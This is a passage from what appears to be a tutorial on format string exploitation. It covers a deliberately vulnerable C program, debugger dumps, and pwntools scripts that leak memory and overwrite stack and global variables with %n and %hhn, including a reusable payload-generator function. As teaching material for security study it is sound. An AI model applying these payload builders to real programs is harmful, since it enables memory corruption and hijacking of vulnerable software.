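        directive = b"%" + str(index).encode() + b"$s"
        padded_len = -(-len(directive) // word) * word  # round up to a word
        needed = base_index + padded_len // word        # index of the address
        if needed == index:
            break
        index = needed  # the digit count may change the length, so retry
    return directive.ljust(padded_len, b"A") + struct.pack(pack_fmt, addr)

print(leak_payload(0x0804a014, 4))   # b'%5$s\x14\xa0\x04\x08'
print(leak_payload(0x0804a014, 10))  # b'%12$sAAA\x14\xa0\x04\x08'
```

Any filler bytes are printed after the leaked string, so the receiving side has to account for them when parsing the output.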
Note
We cannot simply type \x0c\xa0\x04\x08%4$s on the command line. Although these escapes spell out the address of printf@got, nothing interprets them as escapes: scanf reads \, x, 0, c as four ordinary characters. Below is an incorrect example:
0xffffccfc│+0x00: 0x080484ce → <main+99> add esp, 0x10 ← $esp
0xffffcd00│+0x04: 0xffffcd10 → "\x0c\xa0\x04\x08%4$s"
0xffffcd04│+0x08: 0xffffcd10 → "\x0c\xa0\x04\x08%4$s"
0xffffcd08│+0x0c: 0x000000c2
0xffffcd0c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd10│+0x14: "\x0c\xa0\x04\x08%4$s" ← $eax
0xffffcd14│+0x18: "\xa0\x04\x08%4$s"
0xffffcd18│+0x1c: "\x04\x08%4$s"
───────────────────────────────────────────────────────────────────[ trace ]────
[#0] 0xf7e44670 → Name: __printf(format=0xffffcd10 "\\x0c\\xa0\\x04\\x08%4$s")
[#1] 0x80484ce → Name: main()
────────────────────────────────────────────────────────────────────────────────
gef➤ x/x 0xffffcd10
0xffffcd10: 0x6330785c
Overwriting Memory¶
Above, we demonstrated how to use format strings to leak stack memory and memory at arbitrary addresses. Can we also modify the value of a variable on the stack, or even a variable at an arbitrary address? The answer is yes: as long as the address of the variable is writable, we can use a format string to modify its value. Recall the following conversion specifier:
%n, does not output characters, but writes the number of characters successfully output so far into the variable pointed to by the corresponding integer pointer parameter.
With this conversion specifier and a few tricks, we can achieve our goal. The discussion has two parts: overwriting variables on the stack, and overwriting variables at specified addresses.
Here we provide the following program to introduce the corresponding parts:
/* example/overflow/overflow.c */
#include <stdio.h>
int a = 123, b = 456;
int main() {
    int c = 789;
    char s[100];
    printf("%p\n", &c);
    scanf("%s", s);
    printf(s);
    if (c == 16) {
        puts("modified c.");
    } else if (a == 2) {
        puts("modified a for a small number.");
    } else if (b == 0x12345678) {
        puts("modified b for a big number!");
    }
    return 0;
}
The makefile is in the corresponding folder. Regardless of which address's variable we are overwriting, we basically construct a payload similar to the following:
...[overwrite addr]....%[overwrite offset]$n
Here ... stands for padding, overwrite addr is the address we want to overwrite, and overwrite offset is the index n such that the slot holding overwrite addr is the nth argument of the format string. So generally, the steps are as follows:
- Determine the overwrite address
- Determine the relative offset
- Perform the overwrite
Overwriting Stack Memory¶
Determining the Overwrite Address¶
First, we need to know the address of the stack variable c. Since ASLR is enabled on almost all systems nowadays, the stack address changes from run to run, so the program intentionally prints the address of c.
Determining the Relative Offset¶
Next, we determine which argument of printf the start of the stored format string corresponds to. Here we use the previously mentioned method of leaking stack values. Through debugging:
→ 0xf7e44670 <printf+0> call 0xf7f1ab09 <__x86.get_pc_thunk.ax>
↳ 0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov eax, DWORD PTR [esp]
0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret
0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov edx, DWORD PTR [esp]
0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret
────────────────────────────────────────────────────────────────────────────────────[ stack ]────
['0xffffcd0c', 'l8']
8
0xffffcd0c│+0x00: 0x080484d7 → <main+76> add esp, 0x10 ← $esp
0xffffcd10│+0x04: 0xffffcd28 → "%d%d"
0xffffcd14│+0x08: 0xffffcd8c → 0x00000315
0xffffcd18│+0x0c: 0x000000c2
0xffffcd1c│+0x10: 0xf7e8b6bb → <handle_intel+107> add esp, 0x10
0xffffcd20│+0x14: 0xffffcd4e → 0xffff0000 → 0x00000000
0xffffcd24│+0x18: 0xffffce4c → 0xffffd07a → "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat[...]"
0xffffcd28│+0x1c: "%d%d" ← $eax
We can see that 0xffffcd14 holds the address of variable c (0xffffcd8c, which contains 0x315 = 789). The format string '%d%d' is stored at 0xffffcd28, and the slot holding printf's format parameter is at 0xffffcd10, so the distance between them is 0x18 bytes, i.e. 6 words. This means the start of the format string is the 7th parameter of the printf function, or the 6th argument of the format string.
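The offset arithmetic is simple enough to script. A minimal sketch, with `format_arg_index` as a hypothetical helper and the addresses taken from the two dumps in this article:

```python
def format_arg_index(format_param_slot, target_slot, word=4):
    """Index k such that %k$... reads the word stored at target_slot.

    format_param_slot is the stack slot holding printf's format pointer.
    """
    delta = target_slot - format_param_slot
    if delta % word:
        raise ValueError("target is not word-aligned relative to the arguments")
    return delta // word

print(format_arg_index(0xffffcd10, 0xffffcd28))  # 6 (overwrite example)
print(format_arg_index(0xffffcd00, 0xffffcd10))  # 4 (leakmemory example)
```

The ValueError branch corresponds to the case where padding is needed before an address can be selected by a single index.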
Performing the Overwrite¶
If we place the address of c at the very start of the format string, the 6th format argument is that address, and we can use %n to modify the value of c. The payload is as follows:
[addr of c]%012d%6$n
The address of c takes 4 bytes, so we print 12 more characters with %012d to bring the output count to 16 before %6$n writes it into c.
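The count that %n stores can be checked offline with a tiny tracer. This is a rough sketch, not a printf implementation: it understands only the directives used in this article, assumes every padded conversion prints exactly its width (true for %012d with a 32-bit int, and for %Nc), counts an unpadded %d or %c as one character, and assumes the raw address bytes contain neither % nor a null byte. `trace_writes` and the sample address 0xffffcd8c (taken from the dump above) are illustrative.

```python
import re
import struct

# %[index$][0][width]conv, limited to the conversions used in this article
SPEC = re.compile(rb"%(?:(\d+)\$)?0?(\d+)?(hhn|hn|n|d|c)")
MASKS = {b"n": 0xffffffff, b"hn": 0xffff, b"hhn": 0xff}

def trace_writes(payload):
    """Return [(arg_index, conversion, value_written)] for each %n-style directive."""
    count = 0   # characters emitted so far
    pos = 0
    writes = []
    while pos < len(payload):
        m = SPEC.match(payload, pos)
        if m is None:
            count += 1          # ordinary byte, echoed as-is
            pos += 1
            continue
        index, width, conv = m.groups()
        if conv in MASKS:
            arg = int(index) if index else None
            writes.append((arg, conv.decode(), count & MASKS[conv]))
        else:
            count += int(width) if width else 1
        pos = m.end()
    return writes

payload = struct.pack("<I", 0xffffcd8c) + b"%012d%6$n"
print(trace_writes(payload))  # [(6, 'n', 16)]
```

The tracer confirms that 4 address bytes plus 12 padded characters make %6$n store 16.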
The specific script is as follows:
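from pwn import *

def forc():
    sh = process('./overwrite')
    # The program prints &c first; parse it as a hexadecimal address
    c_addr = int(sh.recvuntil(b'\n', drop=True), 16)
    print(hex(c_addr))
    # 4 address bytes + 12 padded characters = 16, which %6$n stores into c
    payload = p32(c_addr) + b'%012d' + b'%6$n'
    print(payload)
    # gdb.attach(sh)
    sh.sendline(payload)
    print(sh.recv())
    sh.interactive()

forc()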
The result is as follows:
➜ overwrite git:(master) ✗ python exploit.py
[+] Starting local process './overwrite': pid 74806
0xfffd8cdc
܌ %012d%6$n
܌ -00000160648modified c.
Overwriting Arbitrary Address Memory¶
Overwriting Small Numbers¶
First, let's consider how to set a variable in the data segment to a small number, that is, a number smaller than the machine word length in bytes. Here we use 2 as an example. You might think nothing changes, but there is a catch. If we still place the address at the very front of the payload, it alone accounts for one machine word (4 or 8 bytes) of output, so whatever we print afterwards, the count written by %n is at least 4.
Perhaps we could use integer overflow to modify the value at the corresponding address, but this would mean we have to output a huge amount of content at once. And this, under normal circumstances, will basically never succeed in an attack.
So what should we do? Think again: do we really need to place the address at the beginning of the string? We do not. Earlier we put the tag at the beginning only to find the offset; it would work just as well in the middle. Likewise, we can put the address later in the payload, and as long as we know its offset, %n will still use it. As mentioned earlier, the start of our format string is the 6th argument. Since we want to write 2, exactly two characters must be output before %n, so the format string must begin with:
aa%k$nxx
Here aa%k$n takes up 6 characters, and the two filler characters xx extend it to 8 bytes, exactly two words. So aa%k is the 6th argument, $nxx is the 7th, and the address we append right after them is the 8th. Setting k to 8 therefore performs the overwrite.
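The word-by-word layout can be verified by slicing the payload. In this sketch `words_by_index` is a hypothetical helper, and 0x0804A024 is the address of a reported by IDA for this particular binary.

```python
import struct

def words_by_index(payload, first_index, word=4):
    """Map each format-argument index to the word of the payload it covers."""
    chunks = [payload[i:i + word] for i in range(0, len(payload), word)]
    return {first_index + k: chunk for k, chunk in enumerate(chunks)}

payload = b"aa%8$naa" + struct.pack("<I", 0x0804A024)
layout = words_by_index(payload, 6)
for index, chunk in layout.items():
    print(index, chunk)

# Exactly two characters precede the %n directive, so 2 is written
print(payload.index(b"%"))  # 2
```

Argument 8 is the packed address, which is why the directive must be %8$n.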
Using IDA, we can obtain that the address of a is 0x0804A024 (since a and b are initialized global variables, they are not on the stack).
.data:0804A024 public a
.data:0804A024 a dd 7Bh
Therefore, we can construct the following exploit code:
def fora():
    sh = process('./overwrite')
    a_addr = 0x0804A024
    # 'aa' brings the count to 2; the address is the 8th format argument
    payload = b'aa%8$naa' + p32(a_addr)
    sh.sendline(payload)
    print(sh.recv())
    sh.interactive()
The corresponding result is as follows:
➜ overwrite git:(master) ✗ python exploit.py
[+] Starting local process './overwrite': pid 76508
[*] Process './overwrite' stopped with exit code 0 (pid 76508)
0xffc1729c
aaaa$\xa0\x0modified a for a small number.
Actually, the key trick to master here is that we don't need to place the address at the very front — it can be placed anywhere, as long as we can find its corresponding offset.
Overwriting Large Numbers¶
Above we introduced overwriting small numbers. Here we introduce how to overwrite large numbers. As we mentioned above, we could choose to output a large number of bytes at once to perform the overwrite, but this basically won't succeed because it's too long. And even if it succeeds, the waiting time would be too long. So is there a better approach? Of course there is.
Before introducing it, let's briefly review how variables are stored in memory. All variables are stored as sequences of bytes, and on x86 and x64 they are stored in little-endian order, meaning the least significant byte is at the lowest address. For example, 0x12345678 is stored from low address to high address as \x78\x56\x34\x12. In addition, recall these two length modifiers in format strings:
hh For integer types, printf expects an int-sized argument promoted from a char.
h For integer types, printf expects an int-sized argument promoted from a short.
Combined with n, they narrow the store: %hhn writes a single byte to the target address, and %hn writes two bytes. Here, we'll use single-byte writes as an example.
First, we still need to determine the address to overwrite. Using IDA, we find that the address of b is 0x0804A028.
.data:0804A028 public b
.data:0804A028 b dd 1C8h ; DATA XREF: main:loc_8048510r
That is, we want to overwrite in the following manner, with the overwrite address on the left and the overwrite content on the right:
0x0804A028 \x78
0x0804A029 \x56
0x0804A02a \x34
0x0804A02b \x12
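The table above is just the little-endian encoding of the target value, one byte per address. A short sketch (`byte_writes` is a hypothetical helper):

```python
import struct

def byte_writes(addr, value):
    """Return (address, byte) pairs for a 32-bit little-endian store of value."""
    return [(addr + i, byte) for i, byte in enumerate(struct.pack("<I", value))]

for address, byte in byte_writes(0x0804A028, 0x12345678):
    print(hex(address), hex(byte))
```

Each pair becomes one %hhn write: the address goes into the payload and the byte determines how many characters must have been output before that write.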
Since the start of our format string is at offset 6, the four addresses are format arguments 6 through 9, and the payload basically looks like this:
p32(0x0804A028)+p32(0x0804A029)+p32(0x0804A02a)+p32(0x0804A02b)+pad1+'%6$hhn'+pad2+'%7$hhn'+pad3+'%8$hhn'+pad4+'%9$hhn'
We can calculate each part sequentially. Here is a basic construction, as follows:
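from pwn import *

def fmt(prev, word, index):
    """Return the directive that makes the low byte of the output count equal word."""
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        # The count already matches, so no padding is needed
        fmtstr = ""
    else:
        # Wrap around modulo 256 to reach a smaller byte value
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr.encode()

def fmt_str(offset, size, addr, target):
    payload = b""
    # One address per target byte, lowest byte first (little-endian)
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    # The address bytes have already been output when the first %hhn runs
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload

payload = fmt_str(6, 4, 0x0804A028, 0x12345678)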
The meaning of each parameter is basically as follows:
- offset is the format-argument index of the first address in the payload
- size represents the machine word length
- addr represents the address that will be overwritten
- target represents the target value we want to overwrite the variable with
The corresponding exploit is as follows:
def forb():
    sh = process('./overwrite')
    payload = fmt_str(6, 4, 0x0804A028, 0x12345678)
    print(payload)
    sh.sendline(payload)
    print(sh.recv())
    sh.interactive()
The result is as follows:
➜ overwrite git:(master) ✗ python exploit.py
[+] Starting local process './overwrite': pid 78547
(\xa0\x0)\xa0\x0*\xa0\x0+\xa0\x0%104c%6$hhn%222c%7$hhn%222c%8$hhn%222c%9$hhn
[*] Process './overwrite' stopped with exit code 0 (pid 78547)
0xfff6f9bc
(\xa0\x0)\xa0\x0*\xa0\x0+\xa0\x0 X � \xbb ~modified b for a big number!
Of course, we could also use %n for each address and still end up with the correct value in b. However, each %n writes a full four bytes starting at its target address, so the write to the last address also overwrites the three bytes that follow b. If those three bytes matter, the program may crash as a result. %hhn does not have this problem, because it modifies only the single byte at the target address.
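The difference can be seen by replaying both variants on a small byte buffer. This is a simulation under stated assumptions: the four 0xaa bytes after b are made-up neighbours, the running counts are chosen so that their low bytes are 0x78, 0x56, 0x34, 0x12, and `apply_writes` is a hypothetical helper.

```python
import struct

def apply_writes(memory, counts, width):
    """Store each running count at successive byte offsets, `width` bytes wide."""
    mem = bytearray(memory)
    for offset, count in enumerate(counts):
        data = struct.pack("<I", count & 0xffffffff)[:width]
        mem[offset:offset + width] = data
    return bytes(mem)

# b = 456 (0x1c8), followed by four hypothetical neighbouring bytes
before = struct.pack("<I", 456) + b"\xaa" * 4
# Increasing output counts whose low bytes are 0x78, 0x56, 0x34, 0x12
counts = [0x78, 0x156, 0x234, 0x312]

with_n = apply_writes(before, counts, 4)    # %n: 4-byte stores
with_hhn = apply_writes(before, counts, 1)  # %hhn: 1-byte stores
print(with_n.hex())    # 7856341203000000aa -> see note below
print(with_hhn.hex())
```

Both variants leave 78 56 34 12 in b, but the %n variant also replaces the three bytes after b with 03 00 00, while the %hhn variant leaves the neighbouring bytes untouched. (The inline comment on the first print is only a pointer to this note, not the exact output.)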